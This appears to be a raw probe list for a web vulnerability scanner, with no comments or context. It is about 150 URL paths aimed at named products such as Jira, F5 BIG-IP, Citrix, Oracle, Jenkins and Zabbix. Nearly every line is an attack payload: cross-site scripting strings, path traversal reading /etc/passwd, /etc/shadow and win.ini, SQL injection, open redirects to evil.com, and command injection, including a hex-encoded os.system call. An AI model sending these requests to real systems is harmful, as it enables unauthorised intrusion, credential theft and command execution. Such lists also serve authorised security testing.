/cgi
/test.cgi
/debug.cgi
/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/static/../../../a/../../../../etc/passwd
/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit
/vendor/phpunit/phpunit/phpunit
/api/vendor/phpunit/phpunit/phpunit
/apps/vendor/phpunit/phpunit/phpunit
/backup/vendor/phpunit/phpunit/phpunit
/oldsite/vendor/phpunit/phpunit/phpunit
/lib/phpunit/phpunit/phpunit
/modules/vendor/phpunit/phpunit/phpunit
/old/vendor/phpunit/phpunit/phpunit
/zend/vendor/phpunit/phpunit/phpunit
/yii/vendor/phpunit/phpunit/phpunit
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(
/plugins/servlet/oauth/users/icon
/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/static/c
/base/static/c
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/debug/pprof/
/plugin/build
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
/getFavicon?host=burpcollaborator.net
/wp
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/mobile/error
/INF/maven/com.atlassian.jira/atlassian
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/sell
/api/snapshots
/secure/ContactAdministrators!default.jspa
/zabbix.php?action=dashboard.view&dashboardid=1
/webapp/?fccc0\><script>alert(1)</script>5f43d=1
/data/autosuggest
/admin/data/autosuggest
/vpn/../vpns/cfg/smb.conf
/share/page/dologin
/Login?!><sVg/OnLoAD=alert`1337`//
/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/api/timelion/run
/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/plugins/servlet/gadgets/makeRequest?url=https
/node/1?_format=hal_json
/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/ReportServer/Pages/ReportViewer.aspx
/+CSCOT+/translation
/+CSCOT+/oem
/getcfg.php
/context.json
/jsp/help
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/console/login/LoginForm.jsp
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/hsqldb%0a
/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/actions/seomatic/meta
/analytics/saw.dll?bieehome&startPage=1#grabautologincookies
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/PDC/ajaxreq.php?PARAM=127.0.0.1+
/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/control/stream?contentId=<svg/onload=alert(1)>
/proxy.stream?origin=http
/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/index.php?redirect=/\/evil.com/
/index.php?redirect=//evil.com
/api/config
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/version.web
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/webadmin/out
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/www/delivery/afr.php?refresh=10000&\),10000000);alert(1337);setTimeout(alert(\
/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/secure/QueryComponent!Default.jspa
/run
/secure/ViewUserHover.jspa
/extdirect
/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/os/mxperson
/meaweb/os/mxperson
/rest/beta/repositories/go/group
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml
/pages/includes/status
/assets/file
/message?title=x&msg=%26%23<svg/onload=alert(1337)>
/jkstatus
/jkstatus;
/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/anchor/errors.log
/filemanager/upload.php
/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
/IMS
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/jolokia/read<svgonload=alert(document.domain)>?mimeType=text/html
/api/jolokia/read<svgonload=alert(document.domain)>?mimeType=text/html
/names.nsf/People?OpenView